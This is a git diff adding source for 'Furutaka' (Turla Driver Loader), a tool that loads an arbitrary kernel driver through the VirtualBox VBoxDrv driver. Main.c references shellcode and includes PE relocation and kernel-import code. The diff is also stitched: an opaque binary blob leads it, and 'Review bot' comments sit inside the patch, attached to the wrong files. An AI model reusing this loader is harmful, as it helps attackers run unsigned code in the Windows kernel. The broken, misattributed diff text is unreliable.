z;(HO^o`yAX#J3?F#5T4L#3{TVTY7pB--Gb#G5A&iaR+Q)3pF{w6LIstd)j~h6s|jvPN8iQ&Z$A1!b@>^5Vs@z2-l;C3zM-1KLz_MC>`PJ z7odK``w;#Y_P&3LxOu-j?TvTivj2dG|Ax4PIE5eK%0yg{fEO;>^G@L@T+N76STz-U 
zClIej7`hnyUlF%Y!=5l)9f+IvvYYp@kI%(f%DCP^9tyvO>m|e~?8J2tar1t4+P7}( z`=;;;T(AF-hd)C62;%==d*2-vMY4C@Lk1DhK}AJDB*z{yhzf#;BoR;%6KM!bn313$ zC_zLJabZ=&xTs_hFs^aMh*?otF@RuX)kRS;hws!30|V>b`##_I-1oVEeCT=3sp{(K zn(q2lRd=86A$$lp2u=7BPy|i*K9CDd_%)COO;}u$qC%kwD*@ingvn3y*+TOeS|8dL zEUSg(&~M;Pob)WP&!1GK7BtTA>M71LvR#?+5ll6TS!(K?{4j zg}vIuvz=;2QRyXo&VY`ECcG60f+lmTYziO zgwFzXq`YOXUz_;0_gdj`i&8#cg;s(l{1uRb_OOOWd>r;Gw6OP@=fQ>#I}`a^z#}H0 z{?Mx69TO2F(6!*Xc4%YJe&990J!oOSt@;bHUCfp39KofokL_iask0bHv@djj79nxJvNhx!b(LgQs* zls?c7E$rzf-d+bEEU)6TFZ3&v5%%g5&u%B+iZX;dXXCS=h5fd~cT2pwRmd0i>=N(p z;5n!x@(Bk6Txel`t+0=l_-Q`_QoHypKNsH@?#L%>54b`T_5v)S2}c3y(88Ws;-?)H zgmDe|gvS6y(1ck)E;M0RAPE|NfgZ0c@yvDt3N?IYu(5wphVUSu9h$H{a1$CH3~DV& zqda^T)J4D&8eR(O3t$UP1!Fnj1Z@l64tPMq&#>+2x1Ca*b7TMu}6V($S0ip z6V`(!d@UTui>wQljzGI0>qcUn2HHs(E=4U`i1r38>}@3;*Zlxp%jZ|n%Fu-2-JxWm z2@8Czgmq%kZzG>@CEy25xB>8hhF6Q{OD%vF_NNl>ss&Jse8LleLTGrgs0F|!Xg~0B z;3jk~xCXcfT?;1u)JM?5K2_pjm0X1SA)l}u@B&%^Yy>Fn#&-jYE=Jry3;R=vca{7G zg)Q<4$0wjHbP70p362G{upgE9QqKVEkWV-`5p9N)0SmmRgzJGz$R`|{gub7Y0qZYA z-JogkLqKc~_A_{1GTJ}1A9z

Iq#7mP|vtgti5rUXJC^*T64J% z8R(;+6;|SV0!`3<;5Oh9DGwIQ1VjJmPw>9V_Ex@s)DMLSw3`w0E#Ow9rI3NoQNaEr z^D_l~)EA%u+{-2RX(`;B#+U7F2c!;U+vM1iV@i%UIVOT*N{*H73@isc0MgHs{*DVK zeLLyvNne-(CVe;Qn@Jx_Ar0Rc1y309w^8umQSjGM@Xk?qIVHsfNc_ONMZxEV4gzV! z18M)HO~1l&5*P4_Q407h(l3$zi1dY|4^;5Ox?p&3DEMl4{S)b1NFPCBoy0haXA<9} zFD3mf>4Qn%TL<_73P_Xwn)K6TE(*UW@7#i%Q;<0;nM=a+$(!?C!+egMzmRhza*jpL zeaN{Dncq>?s0$0{6|H#28BlDaC<9;;;10|M!hyv=Ib26W|9d0#*P8Ksj&(XaL%QuK@Eg&es5Yz#9kzmH}24tV0 zUH}a^0ds&bU@?#ZtOE*xYTyWP9{2-z1atz7r#NoF7=Q&h0yBU>fJBA}B}$1=;* zNlD=)|1#773XXjWPf_Ci)`O_Q_(6C@Y6vxy8b&Em!>JKCu~eo;QKKmpN|hQzsZnDo zbxMQMq_ik)N{7;=^bjrvlp$qA(G-g^rc5YP%8W9nEGSFL3Wt6irs?CU3DiW&ma@Z} zSM4bWYBJvcI)!qgrc%y$8>}nkM!8edC=a{~)|2w0yb&BTsacc{H5=hF2k&Q{hi17z z@ZMR&7w;Vt6p?gc;ayzmPBOOK0?bGTRfVkdp{IVY3ri#5XnZRkv-4pXl)>d3yI)SbJT*0{8CUay(72#XcTs zo(H*K9`Q~0%i>w2`{xlm^bhi2eeTVjOkP^YGrjlbb?<*cJ^FijdkglufqV0aBf8t_ z+&7cwYwpeJbwu~c>sN|cJ);+~|Mr31`Ta`sT+HO-`k8?}y#@Z(ZhvNPhQNr~n+#(7F8kXD^jo)&Yn8WJe`j;w%s!RxDJn3I_AM*0 zG9$O25%q65-4@Z_{N7#M&+FP-L};VkWx8{EKJ0J)QcrJTE2$vGH;nQgr|IpbdXl_$ z%u7uP-j%j=!kq(G%WEf(J}^iJk{51gYK+$08CUB-(fj@c>Zw zgFS*|&+|aN8GH-4Al>J|9bP60XnrTzlkDB%zj`#Mj5oHD@s*+uJjeKqdFqe;{{MUM z`FrKR{XO{a7*jdH_MAv=1Ur^3h)K+C90Edk!#%D>p~Tb}6XSreSkmY59tk-j;>LSI zi9|$LNE|0F1}&5mjq|Z+lqRjnEhvIIiBf2`UI}^Qaqnb+rwFIZr|Ag0@! 
zyC9VJNJcc~zStgOki;81h_vn){ur5H?;jY-#`zeQ^Wsvd1ZLsb0tR2+=7^PcH8nY2 zkVd!5i9o$MI3rnrZ{~of_uUL_&oof9R3SY!vgU$0XVNu?fyjn=nw=gf1h!p zN!641OQuG0Ing|8Iq&-zAeZclFuZ(z3GXXf^vMxat&YDxNjDG{=pP~2m6S6|WA8-c zu{>gy@7ZDuwFhfVio*-fa5x+}(e9imvRi^YIGhN|1hwadKb}w_N2>~D1?j&Z*BL0y z?{@osSJ$3=!CpBc9?5(6FrKp)$5Sm)fstG)DwY!y9vu~7$d1Q;ixc&TLA&UFIbC;k z;iON%XZao@$f zuDoXn&OcDP`)LI-29Z|b=^qxu_U4eo!p73>F+;GFGDKeQk>WkhLM0#%?S-G9IJ~uD zdeZBWCc`N9z84yJ1RGs9em($a4EP58Cog&iN{U*B-0p1(<#q_#?Np8z*Ppb!zj!$j zs4%aYQ^%3!?IY6Y$sCp(P^ybpDh7KZnmsctIyTNfqB~66umt-(7BxXhet-&^Q!SSD z>|5UFaiYn`Jwd+L4?e4f|5*WSyQmRzPPaXT=A=7r4rkc(30GegC(scQl)gMPiabNS?RUX z52dPQPG#J(g0i}@_A-TX%W}W+%<|gurgEx6yTYR)zM`<=T*a#jrAph%(8}D(gO#n7 zQdM-7PgP1)S=F_w4^^tWoOW?{73`|p)xJxi+OpcOI zuY_z^R1{((Ty;uhfRi9wl-W0XG_Bn8m82O%<-?+aIkw#^8V0fH)L(_aGeevbP0gX` z)GU$IRBG?e_ceu6ZW(VVJ#whx=bV=F=i56=O6A7NWYs>tGbMMN^g^oe%~#FcOFh1> z*Otj0`2KeDt)#0SpFhqx{e1TQfsqY1;Txw9tI-zwElkPmW%H4e&*Qa*oL}^A&v>PA zKZ$4O>786QTW`hV?{>j+!nygCgXd?PF{1WAFtWaq&8i!f=p}-K&e)lnN+;8UB&7W^ zoERA&CNUUdVxl5q3bY*d!YFwL<2x_?inpIfjTKX(ho&fApYz5=)1|of>AbHqlizh3 zTDp4`(pF>z6)|J{2#aB%exYuLc4%xY*V@P^Fgn68gm*w=a6k>C*s(^vN5~LMg?AB} zg=iXsLFq=a@-~R;h--EjXIxM7SzZ%YY8SSVid$fnLb%7GEtY?pk1&0Ab?)5i30-n~inhv&)G=zb8#=#f$m?%> zY#;9AtFWwcn9lT+$8mCdRjS*bNn4a@9aWT;C{#S?E!}i_)#ooAs>i+FK6Ugz(KRE@ z#-&5)Yirc#2@apL=!ehJE$4ekeBC&${mC!lW$w5BlGms|^x?~a_l_fGZof6yHM-EkO_k@PkOfQsdUA5B@dV-sV2l-2aDfW4~QSdkHn-8D6Ym z^bmd{mLn5>5-j@oS(`vZmL9D`7Kk#{1PfHjyh0V1iXt)ig{XSrEEv<87*%^ae&o>R zEHnNO>yXGXM$**S#LUXf%9oz|KisG(ZOq@O-oM)@sVO^J)j)NM@jr&n>HV)ghaAn! 
z@Y5OUJjci-FMMU*8#8Yovu6$F^8?&Gr<*Q3nHW4O>s+($>7QiYS==s&&3pGtb?yE| z`JLs?fs>~gh7b6~-9>M82Y%7+rsSg$`XACNd~RQ!^v0krt|h0ke$A*&5w23}N4MO4 z8PXPga_Y%#el~3nejmCsFg{E%ahE}N=$xigPtc|kQs`U7#U&9s+O#IEE=bdi45jW6 z-~`5S4Hw~1@FF0P6G_XGXkn7@5}_&d#=O|kr*&!VLd`<;3^k$H5nj(IHYUa((4QAI zL&-`S)bvlp7?5Hc`Z+2eIVQc6d!d!rRM^WnkQ|De;#!yB_Mte-Th_E3Fc&aBo?jX`3Q%-k6bCOd|mbF0v*f8CbhDq`ujJpSw# zuh!?S5-XdF^0&>GEqGA;`|-3Dr~KOP@6v9nFLnvKQ$KRfu_`O6MoYErCfP=-Ha$No zIcB1RowVeBwzB$BryC9_&$nMaFS1YZs(1a+ohfraCQO(Yy)<*!HhudY7rd@49sf?( z`rx#6RB@!t@_8TUd%acKJ4>E>>T}nw^@Vc7T22p5@jEZC7nLE_`TT9XR)hGN4%0dF z4^1_GZGz}K4H$Gs-<0FS*Wb_abhLkeH_~Y!tEk^Dqf@hmBEi>AFjz=2WoMB$GDkl<*GqUmVM3jiN`AVgs0p{0vol@`GS_ z{*d>pUn~`R6#w`Q?Osd*7>}s(gv9pO;_QQ*`OFYK_d&tg4l9ulBij-ajFKJjDOl&LHJGM?PLKsZ6J{e3q@g8{TZb zP5yYpi}=@zOO|nLj<2m5csTTJ#JUT|JPj(H#&;cPoVQ@4$giJ_!bcaq-?^z|#5s|+ zWLM9Ja(*vtm6shF*fOzx-~E-x7A*ORWhlBam031L^$IIy;4Fj7@unv02X7pFs3p{> z;>p94t5)lt${w>a_}FrvS)91zHWivH=Uq@3V)JYIGw%~JQK!G1ac({&IcS4g(%lJK z4Wr{<{K`7t`9y8_-P3!g*l!xKpm22VqxoGONu5h80~kMdxeaK!rZ%%|{pIS+Mb#aL z2flgacDwL%XkoSDxV>c?$W7E|Cc=mX*>KLLyDF_)Qd1E+K%L@h*{H?w0WUv zp>YQNulfysTM=$5_IA8pgv@qEY5Y?c!jM3p#_K}RGK(-t6SQwkhR}tep;;QR49rY~ zk3Sj4F~xBX|M<-3q=PamD`BHv{_(Ub#vjVAmupw~MBSIt**X8*g|*D5Vx9wEPSG-= zENdT~U+ccSNoeo}a&cM|Vae;AN6Co|6;m8CJz+$W z?Cg(sE;pUFW^OtkZ;7<1jwr-AYb2MvfV?R#JDoafIt@G@L)-GKzdQ(yHi@;BhpR=8Z(_6Fa4}85hu`S|jqo<7zK~3G`MQ8X0_W= zC95&opYK&ivQw|M-coXTy8nIbt@J0Jx>e&szm9W0$nZ|jGd{BZ`kFwxWZRXo`QIuH z5B`)Ld#`28cEyvQk9*Z9&}m|-h<~a6v9IpbZ*ToqgdjOfCH;aiZPmA%ASv4Sf9F*B z-}M8vyI-eJ+$%3mt=_lcud~vtH91-LLuRL5ZBb;pp4>h8fmfW}CrNY8;Xz#ObxD!Y z$0Ubnu&t%PuekRqalXY$%SZJtQYi)7R$cay7O6YMn40gCnWZ_qEAs526Q7kd{%Q(v zzaSGakNfhM^IB`}HjkAyPBcy(8XzNaamiKFF$Xy22XC`=c>j!=`Jd=qUzbp8EK4a#h$LH`a8uB`X{wM4dqt6NY z4||@z7hiaN#Gsq=R=piRaO<*ZrPMEM$?&*@QeFq|joU&x@T{|E^BD1;8Az7i^Lp|H?p7{GY#fp0pXGRame|G$fI5(HQ zOE5($V z<;V>wZ*?umgUCI;-FNKRA`i(DN-F&X9%x3IuyP7Eg)^94>cF8lMR@;bB@SuV=N zkG1qJ4`P#Fcj=k%tCCTGcP?&Dn;Dz1ENI${MWzwmNft@|=jJc}u1~ll_he(vm7Nc# 
zty=cEGkdv4_%kP!PTkr=>j#M)dllI5ASC#za`V-ZPI?_VS!*`c=%lbK|ExC{e6dp5 zl`FY@ybOJLNY1nm%{Nzj3{igR(Q(@F{g*#IU*|1tjchcd*UYz%d2RP+<4+IwWLeL& zvgAnEWQNVrbvsk)eJ~>H(&mpg7ao7j>KbhGOMLzx_hO^gI`}u_)I08plgnryzN#@Y zqA`Bx`W=6sld*jMTAev9#(OPuh4sjzqfPf`i?2SkID7Y971g{-X|Jf zl8n#FKi@cBGK4W)gb_vN_5(=gAy2NpF*5#Xmhr>+z^I;$D&k_^XgPS0qH#Gl2LJ3S zyFPtIz-O5;bCT_&2HlbN_6YB~p1-hj8$E+;Tt&>CcBP#QoeCW@9E46RA_a}r5LYsc zxZz>s5}y$_niCXJ@c6UT@bz}^Gw8i$z+>Z-#4=sOgy&UTjOlP zM}3y4TTqzG%-eG|aFX7=_ZXOay}t9nu2{Yhi>lJJ>tTyJZAcsJDZ|Z zU*4f&wGW?P@WyT4sXH2B8s5(wj-J}AW1{?rO}@&?)H7bUbhS)w8V*mA@`=3bK73>O zvjuN9ZCyRx+IQ|TqjD*;&EBPV&G6n*6I1J*DPli;-M4)8uH37#*6jQjChkg_2d5r+ zp8Csorkk1k-zyzXO}XQdbw!3kDa@7msLByY_Up=E3{Lb zEjDV>(J7e+nR4QvM!ibO`OZDNxXI<7qukgL(T&GjzExC*`Ph7!>-eZKbyIc}d-mcH z#>KfM2ZGiHeUoz<%}>0IsZ0AG5xm{vJJu7#b-I{{;V{S z4xFMr6Japu=>L^zPTyM+y?03pJ!u7@yCSkIa%FCK@8x|_maNcXF`SGE?z~8gu`u1A znkoO%*V})&E@yk=Z)z6@4-q-DS$G`5H4(AYl%TuvI)h3y15Kp^Qg&=K-`O_K%Ic-P zCrirrS#iP}Yi02#c`a(~59}gx{CsooEvuX4GCTS4nFluM&P@(Jd(6iu-WE0elK$DW z^@gvpgVU{ojj3u{TO7|_7rAdCt<~64sh_fMWn%5UJKH?RWoc&Si>^%QC=3=;SQ4XY@3Kon(~C+{WDJt-bI*x? z1T?RPnj}7dtac#vSdiNZ^MN0ta_(5iYN|O`y*Ri3*i%jB$4>5@cVU}move7Ypu@{U zeDUV4cCnVihgVL%kjUNdp1S&1*P2iBnEOr`9k8{nUYGwR+5F4e8KaAAD+U`^@6Y}{ n%S&B!u3uvK>=?D`lEKV5BfWkWcd9q?(lc76qS3^}{Nn!rDF%wE literal 0 HcmV?d00001 diff --git a/Source/Furutaka/global.h b/Source/Furutaka/global.h new file mode 100644 index 0000000..c6cf4d0 --- /dev/null +++ b/Source/Furutaka/global.h 
@@ -0,0 +1,50 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2016
+*
+* TITLE: GLOBAL.H
+*
+* VERSION: 1.00
+*
+* DATE: 01 Feb 2016
+*
+* Common header file for the program support routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+//disable nonmeaningful warnings.
+#pragma warning(disable: 4005) // macro redefinition
+#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
+#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
+#pragma warning(disable: 6102) // Using %s from failed function call at line %u
+#pragma warning(disable: 6320) //exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER
+
+#include
+#include
+#include "ntos.h"
+#include "minirtl\minirtl.h"
+#include "minirtl\rtltypes.h"
+#include "minirtl\cmdline.h"
+#include "sup.h"
+#include "cui.h"
+#include "instdrv.h"
+
+#if !defined UNICODE
+#error ANSI build is not supported
+#endif
+
+#if (_MSC_VER >= 1900)
+#ifdef _DEBUG
+#pragma comment(lib, "vcruntimed.lib")
+#pragma comment(lib, "ucrtd.lib")
+#else
+#pragma comment(lib, "libvcruntime.lib")
+#endif
+#endif
diff --git a/Source/Furutaka/instdrv.c b/Source/Furutaka/instdrv.c
new file mode 100644
index 0000000..5d53482
--- /dev/null
+++ b/Source/Furutaka/instdrv.c
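Review bot: The file-wide `#pragma warning(disable: 6102)` in global.h switches off the code-analysis check for using a value from a failed call in every translation unit that includes this header, and the patch contains exactly that pattern elsewhere (instdrv.c and main.c test output pointers instead of the returned status in several places). Scoping the suppression with `#pragma warning(push)` / `#pragma warning(pop)` around the specific call sites that need it keeps the analyzer useful for the rest of the code. The two bare `+#include` lines appear to have lost their angle-bracketed header names in extraction, so which system headers are pulled in ahead of ntos.h cannot be confirmed from this view.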
@@ -0,0 +1,265 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2015 - 2016, portions (C) Mark Russinovich, FileMon
+*
+* TITLE: INSTDRV.C
+*
+* VERSION: 1.11
+*
+* DATE: 01 Feb 2016
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+
+/*
+* scmInstallDriver
+*
+* Purpose:
+*
+* Create SCM service entry describing kernel driver.
+*
+*/
+BOOL scmInstallDriver(
+ _In_ SC_HANDLE SchSCManager,
+ _In_ LPCTSTR DriverName,
+ _In_opt_ LPCTSTR ServiceExe
+ )
+{
+ SC_HANDLE schService;
+
+ schService = CreateService(SchSCManager, // SCManager database
+ DriverName, // name of service
+ DriverName, // name to display
+ SERVICE_ALL_ACCESS, // desired access
+ SERVICE_KERNEL_DRIVER, // service type
+ SERVICE_DEMAND_START, // start type
+ SERVICE_ERROR_NORMAL, // error control type
+ ServiceExe, // service's binary
+ NULL, // no load ordering group
+ NULL, // no tag identifier
+ NULL, // no dependencies
+ NULL, // LocalSystem account
+ NULL // no password
+ );
+ if (schService == NULL) {
+ return FALSE;
+ }
+
+ CloseServiceHandle(schService);
+ return TRUE;
+}
+
+/*
+* scmStartDriver
+*
+* Purpose:
+*
+* Start service, resulting in SCM drvier load.
+*
+*/
+BOOL scmStartDriver(
+ _In_ SC_HANDLE SchSCManager,
+ _In_ LPCTSTR DriverName
+ )
+{
+ SC_HANDLE schService;
+ BOOL ret;
+
+ schService = OpenService(SchSCManager,
+ DriverName,
+ SERVICE_ALL_ACCESS
+ );
+ if (schService == NULL)
+ return FALSE;
+
+ ret = StartService(schService, 0, NULL)
+ || GetLastError() == ERROR_SERVICE_ALREADY_RUNNING;
+
+ CloseServiceHandle(schService);
+
+ return ret;
+}
+
+/*
+* scmOpenDevice
+*
+* Purpose:
+*
+* Open driver device by symbolic link.
+*
+*/
+BOOL scmOpenDevice(
+ _In_ LPCTSTR DriverName,
+ _Inout_opt_ PHANDLE lphDevice
+ )
+{
+ TCHAR completeDeviceName[64];
+ HANDLE hDevice;
+
+ RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName));
+ wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName);
+
+ hDevice = CreateFile(completeDeviceName,
+ GENERIC_READ | GENERIC_WRITE,
+ 0,
+ NULL,
+ OPEN_EXISTING,
+ FILE_ATTRIBUTE_NORMAL,
+ NULL
+ );
+ if (hDevice == INVALID_HANDLE_VALUE)
+ return FALSE;
+
+ if (lphDevice) {
+ *lphDevice = hDevice;
+ }
+ else {
+ CloseHandle(hDevice);
+ }
+
+ return TRUE;
+}
+
+/*
+* scmStopDriver
+*
+* Purpose:
+*
+* Command SCM to stop service, resulting in driver unload.
+*
+*/
+BOOL scmStopDriver(
+ _In_ SC_HANDLE SchSCManager,
+ _In_ LPCTSTR DriverName
+ )
+{
+ INT iRetryCount;
+ SC_HANDLE schService;
+ BOOL ret;
+ SERVICE_STATUS serviceStatus;
+
+ ret = FALSE;
+ schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS);
+ if (schService == NULL) {
+ return ret;
+ }
+
+ iRetryCount = 5;
+ do {
+ SetLastError(0);
+
+ ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus);
+ if (ret == TRUE)
+ break;
+
+ if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING)
+ break;
+
+ Sleep(1000);
+ iRetryCount--;
+ } while (iRetryCount);
+
+ CloseServiceHandle(schService);
+
+ return ret;
+}
+
+/*
+* scmRemoveDriver
+*
+* Purpose:
+*
+* Remove service entry from SCM database.
+*
+*/
+BOOL scmRemoveDriver(
+ _In_ SC_HANDLE SchSCManager,
+ _In_ LPCTSTR DriverName
+ )
+{
+ SC_HANDLE schService;
+ BOOL bResult = FALSE;
+
+ schService = OpenService(SchSCManager,
+ DriverName,
+ DELETE
+ );
+
+ if (schService == NULL) {
+ return bResult;
+ }
+
+ bResult = DeleteService(schService);
+
+ CloseServiceHandle(schService);
+
+ return bResult;
+}
+
+/*
+* scmUnloadDeviceDriver
+*
+* Purpose:
+*
+* Combines scmStopDriver and scmRemoveDriver.
+*
+*/
+BOOL scmUnloadDeviceDriver(
+ _In_ LPCTSTR Name
+ )
+{
+ SC_HANDLE schSCManager;
+ BOOL bResult = FALSE;
+
+ if (Name == NULL) {
+ return bResult;
+ }
+
+ schSCManager = OpenSCManager(NULL,
+ NULL,
+ SC_MANAGER_ALL_ACCESS
+ );
+ if (schSCManager) {
+ scmStopDriver(schSCManager, Name);
+ bResult = scmRemoveDriver(schSCManager, Name);
+ CloseServiceHandle(schSCManager);
+ }
+ return bResult;
+}
+
+/*
+* scmLoadDeviceDriver
+*
+* Purpose:
+*
+* Unload if already exists, Create, Load and Open driver instance.
+*
+*/
+BOOL scmLoadDeviceDriver(
+ _In_ LPCTSTR Name,
+ _In_opt_ LPCTSTR Path,
+ _Inout_ PHANDLE lphDevice
+ )
+{
+ SC_HANDLE schSCManager;
+ BOOL bResult = FALSE;
+
+ if (Name == NULL) {
+ return bResult;
+ }
+
+ schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
+ if (schSCManager) {
+ scmRemoveDriver(schSCManager, Name);
+ scmInstallDriver(schSCManager, Name, Path);
+ scmStartDriver(schSCManager, Name);
+ bResult = scmOpenDevice(Name, lphDevice);
+ CloseServiceHandle(schSCManager);
+ }
+ return bResult;
+}
diff --git a/Source/Furutaka/instdrv.h b/Source/Furutaka/instdrv.h
new file mode 100644
index 0000000..91400f2
--- /dev/null
+++ b/Source/Furutaka/instdrv.h
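Review bot: scmOpenDevice formats `DriverName` into the 64-TCHAR `completeDeviceName` with `wsprintf`, which bounds its output at 1024 characters rather than at the destination buffer, so a name of 60 or more characters overruns the stack buffer; the visible callers only pass short literal names, but the routine is exported through instdrv.h with no such contract. A length check ahead of the format, `if (_strlen_w(DriverName) + 4 >= _countof(completeDeviceName)) return FALSE;`, or a sized formatter, closes that. scmLoadDeviceDriver discards the results of scmInstallDriver and scmStartDriver and reports only whether scmOpenDevice succeeded, so a caller cannot tell which step failed; the header comment on scmStartDriver also reads `drvier` for `driver`.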
@@ -0,0 +1,54 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2015, portions (C) Mark Russinovich, FileMon
+*
+* TITLE: INSTDRV.H
+*
+* VERSION: 1.10
+*
+* DATE: 10 Mar 2015
+*
+* Common header file for the program SCM usage.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+BOOL scmInstallDriver(
+ _In_ SC_HANDLE SchSCManager,
+ _In_ LPCTSTR DriverName,
+ _In_opt_ LPCTSTR ServiceExe
+ );
+
+BOOL scmStartDriver(
+ _In_ SC_HANDLE SchSCManager,
+ _In_ LPCTSTR DriverName
+ );
+
+BOOL scmOpenDevice(
+ _In_ LPCTSTR DriverName,
+ _Inout_opt_ PHANDLE lphDevice
+ );
+
+BOOL scmStopDriver(
+ _In_ SC_HANDLE SchSCManager,
+ _In_ LPCTSTR DriverName
+ );
+
+BOOL scmRemoveDriver(
+ _In_ SC_HANDLE SchSCManager,
+ _In_ LPCTSTR DriverName
+ );
+
+BOOL scmUnloadDeviceDriver(
+ _In_ LPCTSTR Name
+ );
+
+BOOL scmLoadDeviceDriver(
+ _In_ LPCTSTR Name,
+ _In_opt_ LPCTSTR Path,
+ _Inout_ PHANDLE lphDevice
+ );
diff --git a/Source/Furutaka/main.c b/Source/Furutaka/main.c
new file mode 100644
index 0000000..aaad15b
--- /dev/null
+++ b/Source/Furutaka/main.c
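Review bot: The SAL annotation `_Inout_opt_ PHANDLE lphDevice` on scmOpenDevice (and `_Inout_ PHANDLE lphDevice` on scmLoadDeviceDriver) does not match the implementation in instdrv.c, which only ever writes `*lphDevice` and never reads it; `_Out_opt_` and `_Out_` respectively describe the real contract and let the analyzer flag callers that expect the incoming value to be preserved. The header also has no `#pragma once` or include guard, unlike global.h in the same patch, so it relies on global.h being its only includer.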
@@ -0,0 +1,838 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2016 +* +* TITLE: MAIN.C +* +* VERSION: 1.00 +* +* DATE: 04 Feb 2016 +* +* Furutaka entry point. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ + +#include "global.h" +#include +#include "vbox.h" +#include "shellcode.h" + +#pragma data_seg("shrd") +volatile LONG g_lApplicationInstances = 0; +#pragma data_seg() +#pragma comment(linker, "/Section:shrd,RWS") + +HINSTANCE g_hInstance; +HANDLE g_ConOut = NULL; +HANDLE g_hVBox = INVALID_HANDLE_VALUE; +BOOL g_ConsoleOutput = FALSE; +BOOL g_VBoxInstalled = FALSE; +WCHAR BE = 0xFEFF; + +#define VBoxDrvSvc TEXT("VBoxDrv") +#define supImageName "furutaka" +#define supImageHandle 0x1a000 +#define PAGE_SIZE 0x1000 +#define scDataOffset 0x214 //shellcode data offset + +#define T_LOADERTITLE TEXT("Turla Driver Loader v1.0 (04/02/16)") +#define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n") +#define T_LOADERRUN TEXT("Another instance running, close it before\r\n") +#define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n") +#define T_LOADERINTRO TEXT("Turla Driver Loader v1.0.0 started\r\n(c) 2016 TDL Project\r\nSupported x64 OS : 7 and above\r\n") + +/* +* TDLVBoxInstalled +* +* Purpose: +* +* Check VirtualBox software installation state. +* +*/ +BOOL TDLVBoxInstalled( + VOID + ) +{ + BOOL bPresent = FALSE; + LRESULT lRet; + HKEY hKey = NULL; + + lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), + 0, KEY_READ, &hKey); + + bPresent = (hKey != NULL); + + if (hKey) { + RegCloseKey(hKey); + } + + return bPresent; +} + +/* +* TDLRelocImage +* +* Purpose: +* +* Process image relocs. 
+* +*/ +void TDLRelocImage( + ULONG_PTR Image, + ULONG_PTR NewImageBase + ) +{ + PIMAGE_OPTIONAL_HEADER popth; + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; + + popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; + + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)NewImageBase - popth->ImageBase; + c = 0; + + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); + + while (p < rel->SizeOfBlock) { + + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } + + chains++; + p += sizeof(WORD); + } + + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } +} + +/* +* TDLGetProcAddress +* +* Purpose: +* +* Get NtOskrnl procedure address. +* +*/ +ULONG_PTR TDLGetProcAddress( + ULONG_PTR KernelBase, + ULONG_PTR KernelImage, + LPCSTR FunctionName + ) +{ + ANSI_STRING cStr; + ULONG_PTR pfn = 0; + + RtlInitString(&cStr, FunctionName); + if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID)&pfn))) + return 0; + + return KernelBase + (pfn - KernelImage); +} + +/* +* TDLResolveKernelImport +* +* Purpose: +* +* Resolve import (ntoskrnl only). 
